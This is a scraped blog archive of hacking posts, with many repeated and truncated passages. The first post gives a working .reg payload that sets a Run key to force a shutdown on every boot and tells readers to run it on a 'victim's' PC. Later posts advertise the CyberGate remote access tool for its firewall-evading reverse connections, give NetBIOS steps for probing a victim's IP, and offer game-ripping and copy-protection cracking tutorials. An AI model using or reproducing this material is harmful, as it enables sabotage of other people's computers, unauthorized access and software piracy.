Got any problem with your friend got to make them pay here is an easy way, but never use it unless it is necessary.
put this following text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"
DONT PUT IT IN your COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you,
start windows in safe mode, and open registry editor by typing
REGEDIT in start->run. navigate to
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
and remove the string value named VIRUS,
restart you computer.
You can also put this in a javascript code,
just add this code to your webpage
Showing posts with label Security Penetration. Show all posts
Showing posts with label Security Penetration. Show all posts
CyberGate
Posted by
Tyson
, at 07:21, in
Labels:
Security Penetration
What is CyberGate:
CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed by our experienced team.
What it can do :
CyberGate was built to be a tool for various possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this though it's abundant array of features. A few of which are illustrated below :
CyberGate achieves this though it's abundant array of features. A few of which are illustrated below :
[+] Automatically map ports if your router supports uPnP;
[+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.
[+] Reverse Connection : Some of the listed advantages of a reverse connection -
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.
NetBios hacking for windows 95/98/ME/NT/XP
Posted by
Tyson
, 30 April 2011 at 05:29, in
Labels:
Security Penetration
Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139
Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok
this is what you see: c:windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139
Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok
this is what you see: c:windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
How to full rip by GR's BlackAce
Hi , welcome to Geek's Republic aka GR .
Today ,I will show you how to rip games,videos and photos.
What you required are :
2)open notepad ,type as below :
@echo off
ren uha.dll uha.exe
uha.exe a -m3 -r -pf -o filename F:\location
ren uha.exe uha.dll
Today ,I will show you how to rip games,videos and photos.
What you required are :
- Notepad (Sure you have if you are using windows)
- uha.dll(which you can download at here )
2)open notepad ,type as below :
@echo off
ren uha.dll uha.exe
uha.exe a -m3 -r -pf -o filename F:\location
ren uha.exe uha.dll
How crack CD protection by #WAREZFRANCE CREW
Posted by
Tyson
, at 18:30, in
Labels:
Security Penetration
Full tutorial made by to Crack CD Protections: Full tutorial made for FOR #WAREZFRANCE
CREW, by FANATIK
Chapters:
1). About, Programs needed … etc.
2). The easy protection.
3). Finding the right file – and the right error.
4). Finding the right line number.
5). Editing the line.
6). Testing.
7). Quick order list.
Here we go (again)!
Chapter I: About, Programs needed … etc.
Hrp! This tutorial is written by FANATIK, member of the #WAREZFRANCE CREW. It is the
second part of my first tutorial: RiPPing
Tutorial, that explains all about RiPPing except how to crack the CD
protections… so here is the other part – how to finish the RiPPing by cracking
the protection. This will help you w/ the most basic system of protection,
called C- dilla, that is the most usual one…
CREW, by FANATIK
Chapters:
1). About, Programs needed … etc.
2). The easy protection.
3). Finding the right file – and the right error.
4). Finding the right line number.
5). Editing the line.
6). Testing.
7). Quick order list.
Here we go (again)!
Chapter I: About, Programs needed … etc.
Hrp! This tutorial is written by FANATIK, member of the #WAREZFRANCE CREW. It is the
second part of my first tutorial: RiPPing
Tutorial, that explains all about RiPPing except how to crack the CD
protections… so here is the other part – how to finish the RiPPing by cracking
the protection. This will help you w/ the most basic system of protection,
called C- dilla, that is the most usual one…
Cracking Tutorial by Buckaroo Banzai [Lesson 4]
Posted by
Tyson
, at 17:24, in
Labels:
Security Penetration
Revision 1
Added for revision 1 -
First, let me tell you about a major fuckup I made.
When I first wrote this file, I left out a major part of the
patch. For all of the user who got that version, I'm sorry
but even I make mistakes at 3:00 in the morning. Anyway,
just replace the original with this updated version
- Buckaroo Banzai
>
Hey, Buckaroo Banzai .. Cracking Guru back once again to
help you lesser crackist learn. This time, we will be going
over Star Control. This is the last lesson in the original
4. From here on out, I will simply release lessons as I
write them.
I want to say a few things about some of the groups out
there right now. Speed isn't everything. I really wish that
for example when you remove a doc check, most of us want it
REMOVED. We don't want to have to enter your group name or
even typing 1 letter is to much. We shouldn't even see the
menu for the doc check. Now, I don't direct this to all of
you, but there seems to have been a move from quality to
quickness. Let's go back to the days of SPI (and INC when
they were first getting started) and crack right. If there
is a doc check, remove it, not just fake it.
Nuff said, on with the tutorial.
Added for revision 1 -
First, let me tell you about a major fuckup I made.
When I first wrote this file, I left out a major part of the
patch. For all of the user who got that version, I'm sorry
but even I make mistakes at 3:00 in the morning. Anyway,
just replace the original with this updated version
- Buckaroo Banzai
>
Hey, Buckaroo Banzai .. Cracking Guru back once again to
help you lesser crackist learn. This time, we will be going
over Star Control. This is the last lesson in the original
4. From here on out, I will simply release lessons as I
write them.
I want to say a few things about some of the groups out
there right now. Speed isn't everything. I really wish that
for example when you remove a doc check, most of us want it
REMOVED. We don't want to have to enter your group name or
even typing 1 letter is to much. We shouldn't even see the
menu for the doc check. Now, I don't direct this to all of
you, but there seems to have been a move from quality to
quickness. Let's go back to the days of SPI (and INC when
they were first getting started) and crack right. If there
is a doc check, remove it, not just fake it.
Nuff said, on with the tutorial.
Cracking Tutorial by Buckaroo Banzai [Lesson 3]
Posted by
Tyson
, at 17:21, in
Labels:
Security Penetration
Oh shit, I have finally found a newer program that has
on disk copy protection. Good, you'all need a refresher
course on so here it is (YO JB study hard, you might learn
something).
CHAMBER of the SCI-MUTANT PREISTEST (CSMP) is a really
fucked up game but was simple to unprotect. So, lets dive
right in. We will be using DEBUG here (although I used
periscope but then shit I'm special) to do the crack. Lets
dive in. When we first load CSMP (the file ERE.COM) and
unassemble it here is what we get.
u 100 10B
119A:0100 8CCA MOV DX,CS
119A:0102 81C2C101 ADD DX,01C1
119A:0106 52 PUSH DX
119A:0107 BA0F00 MOV DX,000F
119A:010A 52 PUSH DX
119A:010B CB RETF
on disk copy protection. Good, you'all need a refresher
course on so here it is (YO JB study hard, you might learn
something).
CHAMBER of the SCI-MUTANT PREISTEST (CSMP) is a really
fucked up game but was simple to unprotect. So, lets dive
right in. We will be using DEBUG here (although I used
periscope but then shit I'm special) to do the crack. Lets
dive in. When we first load CSMP (the file ERE.COM) and
unassemble it here is what we get.
u 100 10B
119A:0100 8CCA MOV DX,CS
119A:0102 81C2C101 ADD DX,01C1
119A:0106 52 PUSH DX
119A:0107 BA0F00 MOV DX,000F
119A:010A 52 PUSH DX
119A:010B CB RETF
Cracking Tutorial by Buckaroo Banzai [Lesson 2]
Posted by
Tyson
, at 17:20, in
Labels:
Security Penetration
Ok , I will start talking about
removing doc check protection schemes. I find, the doc check
scheme to be slightly more difficult to work on than normal
INT 13 schemes.
What is a doc check. Usually, a doc check when a
program ask the user to enter a phrase or code supplied with
the manual. Now, one might think that "Shit, we can just
type all the codes in to a textfile and upload it with the
DOCS", but that way of thinking breaks down on programs such
as Future Classics where there are 6 pages with about 200
codes per page. So it is just better to remove the check
completely.
In this primer, I will get in to the theory of removing
a doc check, then start with a simple example (Electronic
Art's ESCAPE FROM HELL). Then in the next file, I will take
you deeper in to the world of doc checks and work with more
difficult examples. But for now, lets get started.
A doc check, in basic theory works much like normal
INT 13 copy protection. Somewhere in the beginning of the
program before it really starts, the check is made. If the
result is ok (ie the user enters the correct word or phrase)
then the program continues. If not, then the program simply
exits to dos.
Simple right, well not really. Usually, the input
routine is part of the standard input routine of the program
so you just can't go about modify the call to INT 16h (the
keyboard interrupt) like you could with INT 13h. So, where
do we start. If you think back to cracking the old INT 13
protection schemes, you would use a program like PCWATCH or
TRAP13 to get a rough idea of where the call resides. With
doc checks, this is really not the best way to do it.
Cracking Tutorial by Buckaroo Banzai [Lesson 1]
Posted by
Tyson
, at 17:17, in
Labels:
Security Penetration
This summary is not available. Please
click here to view the post.
Cracking Tutorial by Buckaroo Banzai [Intro]
Posted by
Tyson
, at 17:15, in
Labels:
Security Penetration
A long time a go, in a galaxy far far away, a great
adventure took ... What, oh sorry, wrong textfile.
Hello my children. Let me introduce myself, I am the
great cracking guru BUCKAROO BANZAI (the original) and I'm
back after a couple of years of hiding (from the Feds? from
the IRS? No, from this girl MaryLou. Let me tell you, she
could ... oh well let's get back to the textfile).
Let me tell you a little history about cracking on the
IBMpc. It all started about 11 years ago with an apple IIe.
See, I owned one and always wanted to learn how to crack (I
was already a good pirate). Unfortunately, I just never
could get the hang of it.
Well anyway, then I got my PC, and right away started to
learn to program. Soon, I had pick up oh 4 languages one of
which was assemble language. So I started down the long road
to becoming a crackist.
adventure took ... What, oh sorry, wrong textfile.
Hello my children. Let me introduce myself, I am the
great cracking guru BUCKAROO BANZAI (the original) and I'm
back after a couple of years of hiding (from the Feds? from
the IRS? No, from this girl MaryLou. Let me tell you, she
could ... oh well let's get back to the textfile).
Let me tell you a little history about cracking on the
IBMpc. It all started about 11 years ago with an apple IIe.
See, I owned one and always wanted to learn how to crack (I
was already a good pirate). Unfortunately, I just never
could get the hang of it.
Well anyway, then I got my PC, and right away started to
learn to program. Soon, I had pick up oh 4 languages one of
which was assemble language. So I started down the long road
to becoming a crackist.
Subscribe to:
Posts (Atom)